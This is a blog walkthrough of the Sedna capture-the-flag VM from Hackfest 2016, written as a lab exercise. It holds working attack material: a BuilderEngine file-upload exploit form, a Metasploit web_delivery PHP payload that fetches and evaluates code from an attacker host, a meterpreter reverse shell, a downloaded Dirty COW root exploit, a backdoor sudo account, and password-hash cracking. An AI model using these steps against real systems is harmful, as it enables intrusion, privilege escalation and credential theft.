CTF Sedna from Viper (hackfest 2016)

The Geek Ghost

Hi everyone, I did the first Vuln VM from hackfest 2016 not long ago and i want to try this one now. It’s the second one by @ViperBlackSkull and it is the second walkthrough for me so if you need more information you can reach me on twitter at @marghost.  You can get the virtual machine HERE. So lets get started.

First of all let’s make a quick nmap and a nikto. i had already made those so i will just copy my note file. (Always open a notepad when you are hacking it is the best advice i can give to you)

80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          38749/udp  status
|_  100024  1          53495/tcp  status

8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat

| smb-os-discovery:
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   NetBIOS computer name: SEDNA
|   Workgroup: WORKGROUP
|_  System time: 2017-03-17T15:38:30-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

80
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.

8080
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found

Ok so here we see many things.  First of all we have two web server, one samba server that can maybe be exploited, also a rpc server that may be used for unbound connection to the server and of course an ssh.

I tried first to find an exploit for the rpc server but i had no luck, metasploit had exploit to ddos or crash it, and other exploits required nfs.  I turn myself to the web servers.  The 80 one have a robot file that is no use.  I skip to the 8080 and tried to poke around tomcat, need to be auth to use main exploit and the default username:password did not work. I tried to bruteforce the password with the tomcat_mgr_login auxiliary scan from metasploit and noting to be found.

So i put my attention into the 80 server there is noting interesting into the /files/ directory.  The system and user directories are locked down… The readme of icon directory is noting but usefull.  I found someting interesting into the license.txt the site use builderengine.  A quick google search pointed out that i can exploit this to send a reverse php shell.

So first of all need to create the builderengine.php file that will send malicious code into the /files/ directory of the remote server.

<!-- # Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0 # Date: 18/09/2016 # Exploit Author: metanubix # Vendor Homepage: http://builderengine.org/ # Software Link: http://builderengine.org/page-cms-download.html # Version: 3.5.0 # Tested on: Kali Linux 2.0 64 bit # Google Dork: intext:"BuilderEngine Ltd. All Right Reserved" 1) Unauthenticated Unrestricted File Upload: POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ Vulnerable Parameter: files[] We can upload test.php and reach the file via the following link: /files/test.php -->
<html>
<body>
<form method="post" action="http://192.168.1.16/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>

</body>
</html>

After that start php server and open the builderengine.php that you just created.

php -S 127.0.0.1:80

Start metasploit and insert the right commands to start a web_delivery exploit

use exploit/multi/script/web_delivery
set target 1
set lhost 192.168.1.14
set payload php/meterpreter/reverse_tcp
run

When you will run the exploit it will give you an adress, just create a remotexploit.php file and fill it like this :

<?php
eval(file_get_contents('http://192.168.1.14:8080/9HL33yWdUR4KFo'));
?>

Now use the delivery form to upload this little php gift from metasploit. Then you will be prompted by metasploit to open a session

sessions -i 1
python -c 'import pty; pty.spawn("/bin/bash")'

Done i have a shell! First win.

A quick view tell me that this linux kernel is vulnerable to the Dirty Dirty Cow exploit

www-data@Sedna:/var/www$ uname -a
uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux


Sooo exploiting dirty cow

curl https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c >dirty.c

<githubusercontent.com/FireFart/dirtycow/master/dirty.c >dirty.c
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4805 100 4805 0 0 29333 0 --:--:-- --:--:-- --:--:-- 29478
www-data@Sedna:/var/www/html/files$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@Sedna:/var/www/html/files$ ./dirty
./dirty
Please enter the new password: test
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash
mmap: b77cc000
ptrace 0
Done! Check /etc/passwd to see if the new user was created
You can log in with username firefart and password test.
DON'T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!!
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash
mmap: b77cc000
madvise 0
Done! Check /etc/passwd to see if the new user was created
You can log in with username firefart and password test.
DON'T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!!
192.168.1.16 - Meterpreter session 1 closed. Reason: Died

When exploited, ruuuun to ssh and login as fast as you can.  You are on the edge as dirty cow is unstable as FU** and can cause a kernel panic anytime.  To make it stable you need to enter a line of code.

echo 0 > /proc/sys/vm/dirty_writeback_centisecs

It should look like this :

root@kali:~# ssh firefart@192.168.1.19
firefart@192.168.1.19's password:
Added user firefart.

Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Mon Mar 20 08:25:24 EDT 2017

System load: 0.15 Memory usage: 2% Processes: 57
Usage of /: 29.7% of 7.26GB Swap usage: 0% Users logged in: 0

Graph this data and manage this system at:
https://landscape.canonical.com/

Last login: Sun Mar 12 00:41:47 2017 from 192.168.0.126
firefart@Sedna:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
firefart@Sedna:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@Sedna:~# adduser pwned
Adding user `pwned' ...
Adding new group `pwned' (1001) ...
Adding new user `pwned' (1001) with group `pwned' ...
Creating home directory `/home/pwned' ...
Copying files from `/etc/skel' ...
no talloc stackframe at ../source3/param/loadparm.c:4864, leaking memory
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for pwned
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
firefart@Sedna:~# usermod -aG sudo pwned

As you can see here the line of code is pushed right after the ssh login and i make a root user right after just in case something goes wrong.

I am groot! It’s another win :p

Now we go fishing for flags.  Found the two first flags the easy way by making a search as root :

firefart@Sedna:/# find . -name "flag.txt"
./var/www/flag.txt
./root/flag.txt
firefart@Sedna:/# cat /var/www/flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289
firefart@Sedna:/# cat /root/flag.txt
a10828bee17db751de4b936614558305
firefart@Sedna:/#

Ok now i need to find the two post exploit flags. My first reflex was to go and investigate the /files/users/ directory of the 80 server…
this was a dead end. Next ting to snoop in was the tomcat install that i was not able to login even if i tried to bruteforce the password.

so a little google search pointed me that tomcat passwords are inside ‘/etc/tomcat7/tomcat-users.xml’

This is what i found

<role rolename="manager-gui"/>
<user username="tomcat" password="submitthisforpoints" roles="manager-gui"/>
</tomcat-users>

Looks like i found a flag!

Now it is time to login into the tomcat server.  Noting to be found there.

I snooped a little more around.  noting to see from running process (ps -aux | less).

No special cron was used.  (/etc/crontab)

I found it!!! an user named crackmeforpoints is inside the user list (cut -d: -f1 /etc/passwd)
crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5/:17104:0:99999:7:::

so i will try to john my way to this password over night… almost done!

root@kali:~/Downloads# john ./crack.password.db</pre>
Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status

Ok after a night John the crazy didn’t crack the password so it is a little more complex that I as expected.  I got the flag and the job is done for me :).  Have a nice day and I will send you in the next walkthrough.

M.

Leave a Reply

Your email address will not be published. Required fields are marked *